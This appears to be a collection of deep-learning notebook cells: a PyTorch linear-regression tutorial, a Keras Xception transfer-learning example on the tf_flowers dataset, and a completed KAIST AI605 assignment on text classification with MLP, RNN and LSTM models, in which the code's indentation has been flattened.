loss_fn = nn.MSELoss(reduction='mean')
loss_fn
# This is a random example to illustrate the loss function
predictions = torch.tensor([0.5, 1.0])
labels = torch.tensor([2.0, 1.3])
loss_fn(predictions, labels)
```
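As a sanity check, we can reproduce the value `nn.MSELoss` returns for this toy example by hand — it is just the mean of the squared differences:

```python
# Manual MSE for the same toy predictions/labels as above
predictions = [0.5, 1.0]
labels = [2.0, 1.3]
squared_errors = [(p - l) ** 2 for p, l in zip(predictions, labels)]
mse = sum(squared_errors) / len(squared_errors)
print(mse)  # ((1.5)**2 + (0.3)**2) / 2 = 1.17
```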
### Cell 1.8
```
# Sets learning rate - this is "eta" ~ the "n"-like
# Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
                dtype=torch.float, device=device)
# Defines a SGD optimizer to update the parameters
optimizer = optim.SGD([b, w], lr=lr)
# Defines a MSE loss function
loss_fn = nn.MSELoss(reduction='mean')
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
    # Step 1 - Computes model's predicted output - forward pass
    yhat = b + w * x_train_tensor
    # Step 2 - Computes the loss
    # No more manual loss!
    # error = (yhat - y_train_tensor)
    # loss = (error ** 2).mean()
    loss = loss_fn(yhat, y_train_tensor)
    # Step 3 - Computes gradients for both "b" and "w" parameters
    loss.backward()
    # Step 4 - Updates parameters using gradients and
    # the learning rate
    optimizer.step()
    optimizer.zero_grad()

print(b, w)
loss
loss.cpu().numpy()
loss.detach().cpu().numpy()
print(loss.item(), loss.tolist())
```
# Model
### Cell 1.9
```
class ManualLinearRegression(nn.Module):
    def __init__(self):
        super().__init__()
        # To make "b" and "w" real parameters of the model,
        # we need to wrap them with nn.Parameter
        self.b = nn.Parameter(torch.randn(1,
                                          requires_grad=True,
                                          dtype=torch.float))
        self.w = nn.Parameter(torch.randn(1,
                                          requires_grad=True,
                                          dtype=torch.float))

    def forward(self, x):
        # Computes the outputs / predictions
        return self.b + self.w * x
```
## Parameters
```
torch.manual_seed(42)
# Creates a "dummy" instance of our ManualLinearRegression model
dummy = ManualLinearRegression()
list(dummy.parameters())
```
## state_dict
```
dummy.state_dict()
optimizer.state_dict()
```
## device
```
torch.manual_seed(42)
# Creates a "dummy" instance of our ManualLinearRegression model
# and sends it to the device
dummy = ManualLinearRegression().to(device)
```
## Forward Pass
### Cell 1.10
```
# Sets learning rate - this is "eta" ~ the "n"-like
# Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
# Now we can create a model and send it at once to the device
model = ManualLinearRegression().to(device)
# Defines a SGD optimizer to update the parameters
# (now retrieved directly from the model)
optimizer = optim.SGD(model.parameters(), lr=lr)
# Defines a MSE loss function
loss_fn = nn.MSELoss(reduction='mean')
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
    model.train() # What is this?!?
    # Step 1 - Computes model's predicted output - forward pass
    # No more manual prediction!
    yhat = model(x_train_tensor)
    # Step 2 - Computes the loss
    loss = loss_fn(yhat, y_train_tensor)
    # Step 3 - Computes gradients for both "b" and "w" parameters
    loss.backward()
    # Step 4 - Updates parameters using gradients and
    # the learning rate
    optimizer.step()
    optimizer.zero_grad()

# We can also inspect its parameters using its state_dict
print(model.state_dict())
```
## train
```
## Never forget to include model.train() in your training loop!
```
## Nested Models
```
linear = nn.Linear(1, 1)
linear
linear.state_dict()
```
### Cell 1.11
```
class MyLinearRegression(nn.Module):
    def __init__(self):
        super().__init__()
        # Instead of our custom parameters, we use a Linear model
        # with single input and single output
        self.linear = nn.Linear(1, 1)

    def forward(self, x):
        # Now it only takes a call to the layer (note the return!)
        return self.linear(x)

torch.manual_seed(42)
dummy = MyLinearRegression().to(device)
list(dummy.parameters())
dummy.state_dict()
```
## Sequential Models
### Cell 1.12
```
torch.manual_seed(42)
# Alternatively, you can use a Sequential model
model = nn.Sequential(nn.Linear(1, 1)).to(device)
model.state_dict()
```
## Layers
```
torch.manual_seed(42)
# Building the model from the figure above
model = nn.Sequential(nn.Linear(3, 5), nn.Linear(5, 1)).to(device)
model.state_dict()
torch.manual_seed(42)
# Building the model from the figure above
model = nn.Sequential()
model.add_module('layer1', nn.Linear(3, 5))
model.add_module('layer2', nn.Linear(5, 1))
model.to(device)
```
# Putting It All Together
## Data Preparation
### Data Preparation V0
```
%%writefile data_preparation/v0.py
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Our data was in Numpy arrays, but we need to transform them
# into PyTorch's Tensors and then we send them to the
# chosen device
x_train_tensor = torch.as_tensor(x_train).float().to(device)
y_train_tensor = torch.as_tensor(y_train).float().to(device)
%run -i data_preparation/v0.py
```
## Model Configuration
### Model Configuration V0
```
%%writefile model_configuration/v0.py
# This is redundant now, but it won't be when we introduce
# Datasets...
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
torch.manual_seed(42)
# Now we can create a model and send it at once to the device
model = nn.Sequential(nn.Linear(1, 1)).to(device)
# Defines a SGD optimizer to update the parameters
# (now retrieved directly from the model)
optimizer = optim.SGD(model.parameters(), lr=lr)
# Defines a MSE loss function
loss_fn = nn.MSELoss(reduction='mean')
%run -i model_configuration/v0.py
```
## Model Training
### Model Training V0
```
%%writefile model_training/v0.py
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
    # Sets model to TRAIN mode
    model.train()
    # Step 1 - Computes model's predicted output - forward pass
    yhat = model(x_train_tensor)
    # Step 2 - Computes the loss
    loss = loss_fn(yhat, y_train_tensor)
    # Step 3 - Computes gradients for both "b" and "w" parameters
    loss.backward()
    # Step 4 - Updates parameters using gradients and
    # the learning rate
    optimizer.step()
    optimizer.zero_grad()
%run -i model_training/v0.py
print(model.state_dict())
```
# Transfer Learning
## Imports and Version Selection
```
# TensorFlow ≥2.0 is required for this notebook
import tensorflow as tf
from tensorflow import keras
assert tf.__version__ >= "2.0"
# check if GPU is available as this notebook will be very slow without GPU
if not tf.test.is_gpu_available():
    print("No GPU was detected. CNNs can be very slow without a GPU.")
    if IS_COLAB:  # IS_COLAB is assumed to be defined earlier in the original notebook
        print("Go to Runtime > Change runtime and select a GPU hardware accelerator.")
import numpy as np
import matplotlib.pyplot as plt
import tensorflow_datasets as tfds
from tensorflow.keras.datasets import mnist
from tensorflow.keras.layers import Dense, Activation, Input, Dropout, Conv2D, MaxPooling2D, Flatten, BatchNormalization, GaussianNoise
from tensorflow.keras.models import Model
!pip install --upgrade deeplearning2020
from deeplearning2020 import helpers
# jupyters magic command
%matplotlib inline
# resize the images to a uniform size
def preprocess(image, label):
    resized_image = tf.image.resize(image, [224, 224])
    # run Xception's preprocessing function
    preprocessed_image = tf.keras.applications.xception.preprocess_input(resized_image)
    return preprocessed_image, label
```
## Loading and Preprocessing
```
# download the dataset with labels and with information about the data
data, info = tfds.load("tf_flowers", as_supervised=True, with_info=True)
# print the most important information
dataset_size = info.splits['train'].num_examples
print('dataset size: ', dataset_size)
class_names = info.features['label'].names
print('class names: ', class_names)
n_classes = info.features['label'].num_classes
print('number of classes: ', n_classes)
batch_size = 32
try:
    train_data = tfds.load('tf_flowers', split="train[:80%]", as_supervised=True)
    test_data = tfds.load('tf_flowers', split="train[80%:100%]", as_supervised=True)
    train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)
    test_data = test_data.map(preprocess).batch(batch_size).prefetch(1)
except Exception:
    # split the data into train and test data with a 8:2 ratio
    train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])
    train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True)
    test_data = tfds.load('tf_flowers', split=test_split, as_supervised=True)
    train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)
    test_data = test_data.map(preprocess).batch(batch_size).prefetch(1)
# show some images from the dataset
helpers.plot_images(train_data.unbatch().take(9).map(lambda x, y: ((x + 1) / 2, y)), class_names)
```
## Definition and Training
```
from tensorflow.keras.applications.xception import Xception
from tensorflow.keras.layers import GlobalAveragePooling2D
# build a transfer learning model with Xception and a new Fully-Connected-Classifier
base_model = Xception(
    weights='imagenet',
    include_top=False
)
model = GlobalAveragePooling2D()(base_model.output)
model = Dropout(0.5)(model)
# include new Fully-Connected-Classifier
output_layer = Dense(n_classes, activation='softmax')(model)
# create Model
model = Model(base_model.input, output_layer)
model.summary()
# set the pretrained layers to not trainable because
# they are already trained and we don't want to destroy
# their weights
for layer in base_model.layers:
    layer.trainable = False
```

```
model.compile(
    optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),
    loss='sparse_categorical_crossentropy',
    metrics=['accuracy']
)
history = model.fit(
    train_data,
    epochs=5,
    validation_data=test_data
)
```

```
# to finetune the model, we have to set more layers to trainable
# and reduce the learning rate drastically to prevent
# destroying the pretrained weights
for layer in base_model.layers:
    layer.trainable = True
# reduce the learning rate to not damage the pretrained weights
# model will need longer to train because all the layers are trainable
model.compile(
    optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),
    loss='sparse_categorical_crossentropy',
    metrics=['accuracy']
)
history_finetune = model.fit(
    train_data,
    epochs=10,
    validation_data=test_data
)
```
## Visualization and Evaluation
```
# add the two histories and print the diagram
helpers.plot_two_histories(history, history_finetune)
```
# Transfer Learning with Data Augmentation
## Model Definition
```
from tensorflow.keras.applications.xception import Xception
from tensorflow.keras.layers import GlobalAveragePooling2D
# build a transfer learning model with Xception and a new Fully-Connected-Classifier
base_model_data_augmentation = Xception(
    weights='imagenet',
    include_top=False
)
model = GlobalAveragePooling2D()(base_model_data_augmentation.output)
model = Dropout(0.5)(model)
# include new Fully-Connected-Classifier
output_layer = Dense(n_classes, activation='softmax')(model)
# create Model
data_augmentation_model = Model(base_model_data_augmentation.input, output_layer)
```
## Adjust Data Augmentation
```
# resize the images to a uniform size
def preprocess_with_data_augmentation(image, label):
    resized_image = tf.image.resize(image, [224, 224])
    # data augmentation with Tensorflow
    augmented_image = tf.image.random_flip_left_right(resized_image)
    augmented_image = tf.image.random_hue(augmented_image, 0.08)
    augmented_image = tf.image.random_saturation(augmented_image, 0.6, 1.6)
    augmented_image = tf.image.random_brightness(augmented_image, 0.05)
    augmented_image = tf.image.random_contrast(augmented_image, 0.7, 1.3)
    # run Xception's preprocessing function
    preprocessed_image = tf.keras.applications.xception.preprocess_input(augmented_image)
    return preprocessed_image, label
batch_size = 32
try:
    train_data = tfds.load('tf_flowers', split="train[:80%]", as_supervised=True)
except Exception:
    # split the data into train and test data with a 8:2 ratio
    train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])
    train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True)
augmented_train_data = train_data.map(preprocess_with_data_augmentation).batch(batch_size).prefetch(1)
```
## Training
```
# set the pretrained layers to not trainable because
# they are already trained and we don't want to destroy
# their weights
for layer in base_model_data_augmentation.layers:
    layer.trainable = False

data_augmentation_model.compile(
    optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),
    loss='sparse_categorical_crossentropy',
    metrics=['accuracy']
)
history_data_augmentation = data_augmentation_model.fit(
    augmented_train_data,
    epochs=3,
    validation_data=test_data
)
```
## Finetuning
```
# to finetune the model, we have to set more layers to trainable
# and reduce the learning rate drastically to prevent
# destroying the pretrained weights
for layer in base_model_data_augmentation.layers:
    layer.trainable = True
# reduce the learning rate to not damage the pretrained weights
# model will need longer to train because all the layers are trainable
data_augmentation_model.compile(
    optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),
    loss='sparse_categorical_crossentropy',
    metrics=['accuracy']
)
history_finetune_data_augmentation = data_augmentation_model.fit(
    augmented_train_data,
    epochs=30,
    validation_data=test_data
)
```
## Visualization
```
# add the two histories and print the diagram
helpers.plot_two_histories(history_data_augmentation, history_finetune_data_augmentation)
```
# KAIST AI605 Assignment 1: Text Classification
TA in charge: Miyoung Ko (miyoungko@kaist.ac.kr)
**Due Date:** September 29 (Wed) 11:00pm, 2021
## Your Submission
If you are a KAIST student, you will submit your assignment via [KLMS](https://klms.kaist.ac.kr). If you are a NAVER student, you will submit via [Google Form](https://forms.gle/aGZZ86YpCdv2zEVt9).
You need to submit both (1) a PDF of this notebook, and (2) a link to CoLab for execution (.ipynb file is also allowed).
Use in-line LaTeX (see below) for mathematical expressions. Collaboration among students is allowed but it is not a group assignment so make sure your answer and code are your own. Make sure to mention your collaborators in your assignment with their names and their student ids.
## Grading
The entire assignment is out of 20 points. You can obtain up to 5 bonus points (i.e. max score is 25 points). For every late day, your grade will be deducted by 2 points (KAIST students only). You can use one of your no-penalty late days (7 days in total). Make sure to mention this in your submission. You will receive a grade of zero if you submit after 7 days.
## Environment
You will only use Python 3.7 and PyTorch 1.9, which is already available on Colab:
```
from platform import python_version
import torch
print("python", python_version())
print("torch", torch.__version__)
```
## 1. Limitations of Vanilla RNNs
In Lecture 02, we saw that a multi-layer perceptron (MLP) without activation function is equivalent to a single linear transformation with respect to the inputs. One can define a vanilla recurrent neural network without activation as, given inputs $\textbf{x}_1 \dots \textbf{x}_T$, the outputs $\textbf{h}_t$ is obtained by
$$\textbf{h}_t = \textbf{V}\textbf{h}_{t-1} + \textbf{U}\textbf{x}_t + \textbf{b},$$
where $\textbf{V}, \textbf{U}, \textbf{b}$ are trainable weights.
> **Problem 1.1** *(2 point)* Show that such recurrent neural network (RNN) without activation function is equivalent to a single linear transformation with respect to the inputs, which means each $\textbf{h}_t$ is a linear combination of the inputs.
In Lecture 05 and 06, we will see how RNNs can model non-linearity via activation function, but they still suffer from exploding or vanishing gradients. We can mathematically show that, if the recurrent relation is
$$ \textbf{h}_t = \sigma (\textbf{V}\textbf{h}_{t-1} + \textbf{U}\textbf{x}_t + \textbf{b}) $$
then
$$ \frac{\partial \textbf{h}_t}{\partial \textbf{h}_{t-1}} = \text{diag}(\sigma' (\textbf{V}\textbf{h}_{t-1} + \textbf{U}\textbf{x}_t + \textbf{b}))\textbf{V}$$
so
$$\frac{\partial \textbf{h}_T}{\partial \textbf{h}_1} \propto \textbf{V}^{T-1}$$
which means this term will be very close to zero if the norm of $\bf{V}$ is smaller than 1 and really big otherwise.
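This behaviour is easy to check numerically; a small sketch (illustrative matrices, not from the lecture) comparing $\|\textbf{V}^{T-1}\|$ for a contractive and an expansive $\textbf{V}$:

```python
import numpy as np

T = 50
# Contractive V (norm < 1) vs. expansive V (norm > 1)
V_small = 0.5 * np.eye(3)
V_large = 1.5 * np.eye(3)

# Frobenius norm of V^(T-1), proportional to the gradient magnitude
vanish = np.linalg.norm(np.linalg.matrix_power(V_small, T - 1))
explode = np.linalg.norm(np.linalg.matrix_power(V_large, T - 1))
print(vanish)   # tiny: the gradient vanishes
print(explode)  # huge: the gradient explodes
```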
> **Problem 1.2** *(2 points)* Explain how exploding gradient can be mitigated if we use gradient clipping.
> **Problem 1.3** *(2 points)* Explain how vanishing gradient can be mitigated if we use LSTM. See the Lecture 05 and 06 slides for the definition of LSTM.
## (Answer)
**Problem 1.1.**
For every $t$, $\mathbf{h}_t$ is recursively defined as
$$ \mathbf{h}_t = \mathbf{V}\mathbf{h}_{t-1} + \mathbf{U}\mathbf{x}_t + \mathbf{b} = \mathbf{V}(\mathbf{V}\mathbf{h}_{t-2} + \mathbf{U}\mathbf{x}_{t-1} + \mathbf{b}) + \mathbf{U}\mathbf{x}_t + \mathbf{b}$$
$$ =\cdots = \mathbf{V}^t\mathbf{h}_0 + \sum_{k=0}^{t-1} \mathbf{V}^{k}\mathbf{U}\mathbf{x}_{t-k} + \sum_{k=0}^{t-1} \mathbf{V}^k \mathbf{b} $$
which is a linear combination of the inputs $\mathbf{x}_1,\mathbf{x}_2,\cdots,\mathbf{x}_t$. This holds for every $t$; therefore, an RNN without a non-linear activation function is equivalent to a single linear transformation of the inputs.
**Problem 1.2.**
With gradient clipping, the norm of the gradient is rescaled whenever it exceeds a chosen threshold (e.g., 1). The update computed from $\frac{\partial\mathbf{h}_T}{\partial\mathbf{h}_1}$ therefore stays bounded even when the norm of $\mathbf{V}$ is larger than 1, mitigating the exploding gradient issue.
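A minimal NumPy sketch of clip-by-norm (the threshold `max_norm=1.0` is an arbitrary choice): if the gradient's norm exceeds the threshold, it is rescaled so its norm equals the threshold while its direction is preserved.

```python
import numpy as np

def clip_by_norm(grad, max_norm=1.0):
    # Rescale the gradient if its L2 norm exceeds max_norm
    norm = np.linalg.norm(grad)
    if norm > max_norm:
        grad = grad * (max_norm / norm)
    return grad

g = np.array([30.0, 40.0])               # norm 50: would explode
clipped = clip_by_norm(g, max_norm=1.0)
print(clipped, np.linalg.norm(clipped))  # direction kept, norm clipped to 1.0
```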
**Problem 1.3.**
In an LSTM, the cell-state recurrence helps avoid vanishing gradients. The cell state is updated additively, so along this path the activation is effectively the identity function, with a derivative of 1.0. The effective recurrent weight is the forget gate activation, so as long as the forget gate is open (activation close to 1.0), the gradient does not vanish.
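In symbols (the standard LSTM cell-state update; notation follows the usual convention rather than a specific slide): the cell state is updated additively,
$$ \mathbf{c}_t = \mathbf{f}_t \odot \mathbf{c}_{t-1} + \mathbf{i}_t \odot \tilde{\mathbf{c}}_t, $$
so the Jacobian along the cell-state path is
$$ \frac{\partial \mathbf{c}_t}{\partial \mathbf{c}_{t-1}} = \text{diag}(\mathbf{f}_t), $$
which stays close to the identity whenever the forget gate $\mathbf{f}_t$ is close to 1, instead of involving a repeated multiplication by $\mathbf{V}$.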
## 2. Creating Vocabulary from Training Data
Creating the vocabulary is the first step for every natural language processing model. In this section, you will use Stanford Sentiment Treebank (SST), a popular dataset for sentiment classification, to create your vocabulary.
### Obtaining SST via Hugging Face
We will use `datasets` package offered by Hugging Face, which allows us to easily download various language datasets, including Stanford Sentiment Treebank.
First, install the package:
```
!pip install datasets
```
Then download SST and print the first example:
```
from datasets import load_dataset
from pprint import pprint
sst_dataset = load_dataset('sst')
pprint(sst_dataset['train'][0])
```
Note that each `label` is a score between 0 and 1. You will round it to either 0 or 1 for binary classification (positive for 1, negative for 0).
In this first example, the label is rounded to 1, meaning that the sentence is a positive review.
You will only use `sentence` as the input; please ignore other values.
> **Problem 2.1** *(2 points)* Using space tokenizer, create the vocabulary for the training data and report the vocabulary size here. Make sure that you add an `UNK` token to the vocabulary to account for words (during inference time) that you haven't seen. See below for an example with a short text.
## (Answer)
**Problem 2.1.**
The vocabulary size is 18282, including the 'PAD' and 'UNK' tokens (see the code below).
```
# Space tokenization
text = "Hello world!"
tokens = text.split(' ')
print(tokens)
# Constructing vocabulary with `UNK`
vocab = ['PAD', 'UNK'] + list(set(text.split(' ')))
word2id = {word: id_ for id_, word in enumerate(vocab)}
print(vocab)
print(word2id['Hello'])
### Problem 2.1 ###
vocab = ['PAD', 'UNK']
for data in sst_dataset['train']:
    for word in data['sentence'].split(' '):
        if word not in vocab:
            vocab.append(word)
word2id = {word: id_ for id_, word in enumerate(vocab)}
print('Vocabulary size: {}'.format(len(vocab)))
```
> **Problem 2.2** *(1 point)* Using all words in the training data will make the vocabulary very big. Reduce its size by only including words that occur at least 2 times. How does the size of the vocabulary change?
## (Answer)
**Problem 2.2.**
The vocabulary size is now 8738, including the 'PAD' and 'UNK' tokens (see the code below).
```
### Problem 2.2 ###
vocab = ['PAD', 'UNK']
vocab_count = {}
for data in sst_dataset['train']:
    for word in data['sentence'].split(' '):
        if word not in vocab and word not in vocab_count.keys():
            vocab_count[word] = 1
        elif word not in vocab and word in vocab_count.keys():
            vocab_count[word] += 1
            if vocab_count[word] >= 2:
                vocab.append(word)
        else:
            continue
word2id = {word: id_ for id_, word in enumerate(vocab)}
print('Vocabulary size: {}'.format(len(vocab)))
```
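An equivalent, more idiomatic construction uses `collections.Counter`: count every token once, then keep those seen at least twice. A self-contained sketch on a toy corpus (the variable names mirror the cell above, but the sentences are made up):

```python
from collections import Counter

toy_sentences = ["the movie was great", "the movie was bad", "great acting"]

# Count every token, then keep only tokens that occur at least twice
counts = Counter(word for s in toy_sentences for word in s.split(' '))
vocab = ['PAD', 'UNK'] + [w for w, c in counts.items() if c >= 2]
word2id = {word: id_ for id_, word in enumerate(vocab)}
print(vocab)
```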
## 3. Text Classification with Multi-Layer Perceptron and Recurrent Neural Network
You can now use the vocabulary constructed from the training data to create an embedding matrix. You will use the embedding matrix to map each input sequence of tokens to a list of embedding vectors. One of the simplest baselines is to fix the input length (with truncation or padding), flatten the word embeddings, apply a linear transformation followed by an activation, and finally classify the output into the two classes:
```
from torch import nn
length = 8
input_ = "hi world!"
input_tokens = input_.split(' ')
input_ids = [word2id[word] if word in word2id else 1 for word in input_tokens] # UNK if word not found
if len(input_ids) < length:
input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end
else:
input_ids = input_ids[:length]
input_tensor = torch.LongTensor([input_ids]) # the first dimension is minibatch size
print(input_tensor)
# Two-layer MLP classification
class Baseline(nn.Module):
def __init__(self, d, length):
super(Baseline, self).__init__()
self.embedding = nn.Embedding(len(vocab), d)
self.layer = nn.Linear(d * length, d, bias=True)
self.relu = nn.ReLU()
self.class_layer = nn.Linear(d, 2, bias=True)
def forward(self, input_tensor):
emb = self.embedding(input_tensor) # [batch_size, length, d]
emb_flat = emb.view(emb.size(0), -1) # [batch_size, length*d]
hidden = self.relu(self.layer(emb_flat))
logits = self.class_layer(hidden)
return logits
d = 3 # usually bigger, e.g. 128
baseline = Baseline(d, length).cuda()
logits = baseline(input_tensor.cuda())
softmax = nn.Softmax(1)
print(softmax(logits)) # probability for each class
```
Now we will compute the loss, which is the negative log probability of the input text's label being the target label (`1`). This turns out to be equivalent to the cross entropy (https://en.wikipedia.org/wiki/Cross_entropy) between the predicted probability distribution and a one-hot distribution of the target label (note that we pass `logits` instead of `softmax(logits)` to the cross entropy, which allows us to avoid numerical instability).
```
cel = nn.CrossEntropyLoss()
label = torch.LongTensor([1]).cuda() # The ground truth label for "hi world!" is positive.
loss = cel(logits, label) # Loss, a.k.a L
print(loss)
```
Once we have the loss defined, only one step remains! We compute the gradients of the parameters with respect to the loss and update them. Fortunately, PyTorch does this for us in a very convenient way. Note that we used only one example to update the model, which is basically Stochastic Gradient Descent (SGD) with a minibatch size of 1. A recommended minibatch size in this exercise is at least 16. It is also recommended that you reuse your training data at least 10 times (i.e. 10 *epochs*).
```
optimizer = torch.optim.SGD(baseline.parameters(), lr=0.1)
optimizer.zero_grad() # reset process
loss.backward() # compute gradients
optimizer.step() # update parameters
```
Once you have done this, all weight parameters will have `grad` attributes that contain their gradients with respect to the loss.
```
print(baseline.layer.weight.grad) # dL/dw of weights in the linear layer
```
> **Problem 3.1** *(2 points)* Properly train a MLP baseline model on SST and report the model's accuracy on the dev data.
> **Problem 3.2** *(2 points)* Implement a recurrent neural network (without using PyTorch's RNN module) with `tanh` activation, and use the output of the RNN at the final time step for the classification. Report the model's accuracy on the dev data.
> **Problem 3.3** *(2 points)* Show that the cross entropy computed above is equivalent to the negative log likelihood of the probability distribution.
> **Problem 3.4 (bonus)** *(1 point)* Why is it numerically unstable if you compute log on top of softmax?
## (Answer)
**Problem 3.1.**
(See the code below.) Validation accuracy of MLP after 10 epochs is 55.40%.
**Problem 3.2.**
(See the code below.) Validation accuracy of RNN after 10 epochs is 57.49%.
**Problem 3.3.**
The cross-entropy computed above is formulated as
$$ H(p,\hat{p}) = -\sum_x \sum_i p_i(x) \log \hat{p}_i(x) $$
where $p$ is the one-hot probability vector of the ground-truth label, and $\hat{p}$ is the predicted probability distribution. Since $p_i$ is 0 except for the ground-truth label dimension, the above form is equivalent to
$$ -\sum_x \log \hat{p}_{y(x)}(x) $$
where $y(x)$ is the ground-truth label of example $x$; this is exactly the negative log likelihood (NLL).
**Problem 3.4.**
The softmax exponentiates the logits. If a logit is very large, `exp` overflows to infinity, the normalized probabilities become `nan`, and so does their logarithm. Conversely, if a logit is much smaller than the maximum, its softmax output underflows to exactly zero, and `log(0)` is `-inf`. Computing the log and the softmax jointly (via the log-sum-exp trick, as `CrossEntropyLoss` does internally) avoids both problems.
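A minimal numerical illustration of this instability (a sketch, not part of the assignment code): taking `log` after a naive softmax breaks down for large logits, while the shifted (log-sum-exp) computation stays finite:

```python
import numpy as np

logits = np.array([1000.0, 0.0])

# naive: exp(1000) overflows to inf, so softmax and its log break down
with np.errstate(over='ignore', invalid='ignore', divide='ignore'):
    naive_log = np.log(np.exp(logits) / np.exp(logits).sum())

# stable: shift by the max before exponentiating (log-sum-exp trick)
shifted = logits - logits.max()
stable_log = shifted - np.log(np.exp(shifted).sum())

print(naive_log)   # [ nan -inf]
print(stable_log)  # [    0. -1000.]
```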
```
### Problem 3.1 ###
class SSTDataset(torch.utils.data.Dataset):
def __init__(self, split, length=16):
assert split in ['train', 'validation', 'test']
self._data = sst_dataset[split]
self.input_lst, self.label_lst = [], []
for data in self._data:
sentence = data['sentence']
tokens = sentence.split(' ')
input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found
if len(input_ids) < length:
input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end
else:
input_ids = input_ids[:length]
self.input_lst.append(torch.LongTensor(input_ids))
label = round(data['label'])
self.label_lst.append(label)
def __getitem__(self, idx):
return self.input_lst[idx], self.label_lst[idx]
def __len__(self):
return len(self._data)
trainset = SSTDataset('train')
validset = SSTDataset('validation')
train_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)
valid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)
baseline = Baseline(d=128, length=16).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(baseline.parameters(), lr=0.01)
for epoch in range(10):
baseline.train()
avg_loss = 0
for input, label in train_loader:
input = input.cuda()
label = label.cuda()
logits = baseline(input)
loss = cel(logits, label)
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
baseline.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
input = input.cuda()
logits = baseline(input)
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
### Problem 3.2 ###
class RNN(nn.Module):
def __init__(self, seq_length, hidden_dim, embed_dim):
super(RNN, self).__init__()
self.seq_length = seq_length
self.hidden_dim = hidden_dim
self.embed_dim = embed_dim
self.embedding = nn.Embedding(len(vocab), embed_dim)
self.linear = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.classifier = nn.Linear(hidden_dim, 2)
self.tanh = nn.Tanh()
def forward(self, input):
assert self.seq_length == input.size(1) # batch_first
emb = self.embedding(input)
h_t = torch.zeros(emb.size(0), self.hidden_dim, device=emb.device)
for seq in range(self.seq_length):
x = torch.cat([emb[:, seq, :], h_t], dim=-1)
h_t = self.tanh(self.linear(x))
out = self.classifier(h_t)
return out
rnn = RNN(seq_length=16, hidden_dim=64, embed_dim=64).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(rnn.parameters(), lr=0.001)
for epoch in range(10):
rnn.train()
avg_loss = 0
for input, label in train_loader:
logits = rnn(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
rnn.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = rnn(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
```
## 4. Text Classification with LSTM and Dropout
Replace your RNN module with an LSTM module. See Lecture slides 05 and 06 for the formal definition of LSTMs.
You will also use Dropout, which randomly makes each dimension zero with the probability of `p` and scale it by `1/(1-p)` if it is not zero during training. Put it either at the input or the output of the LSTM to prevent it from overfitting.
```
a = torch.FloatTensor([0.1, 0.3, 0.5, 0.7, 0.9])
dropout = nn.Dropout(0.5) # p=0.5
print(dropout(a))
```
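The `1/(1-p)` scaling is easy to reproduce by hand. A sketch of inverted dropout with NumPy (the seeded `rng` is just for reproducibility):

```python
import numpy as np

rng = np.random.default_rng(0)
a = np.array([0.1, 0.3, 0.5, 0.7, 0.9])
p = 0.5

mask = rng.random(a.shape) >= p  # keep each dimension with probability 1-p
dropped = a * mask / (1 - p)     # surviving values are scaled by 1/(1-p)
print(dropped)                   # each entry is either 0 or double the original
```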
> **Problem 4.1** *(3 points)* Implement and use LSTM (without using PyTorch's LSTM module) instead of vanilla RNN. Report the accuracy on the dev data.
> **Problem 4.2** *(2 points)* Use Dropout on LSTM (either at input or output). Report the accuracy on the dev data.
> **Problem 4.3 (bonus)** *(2 points)* Consider implementing a bidirectional LSTM with two layers. Concatenate the forward-direction output at the final time step and the backward-direction output at the first time step for the final classification. Report your accuracy on the dev data.
## (Answer)
**Problem 4.1.**
(See the code below.) Validation accuracy of LSTM after 10 epochs is 66.94%.
**Problem 4.2.**
(See the code below.) Validation accuracy of LSTM with Dropout after 10 epochs is 68.76%.
**Problem 4.3.**
(See the code below.) Validation accuracy of bi-directional stacked (2 layers) LSTM after 10 epochs is 64.03%.
```
### Problem 4.1 ###
import time
class LSTM(nn.Module):
def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False, pretrained=False):
super(LSTM, self).__init__()
self.seq_length = seq_length
self.hidden_dim = hidden_dim
self.embed_dim = embed_dim
self.pretrained = pretrained
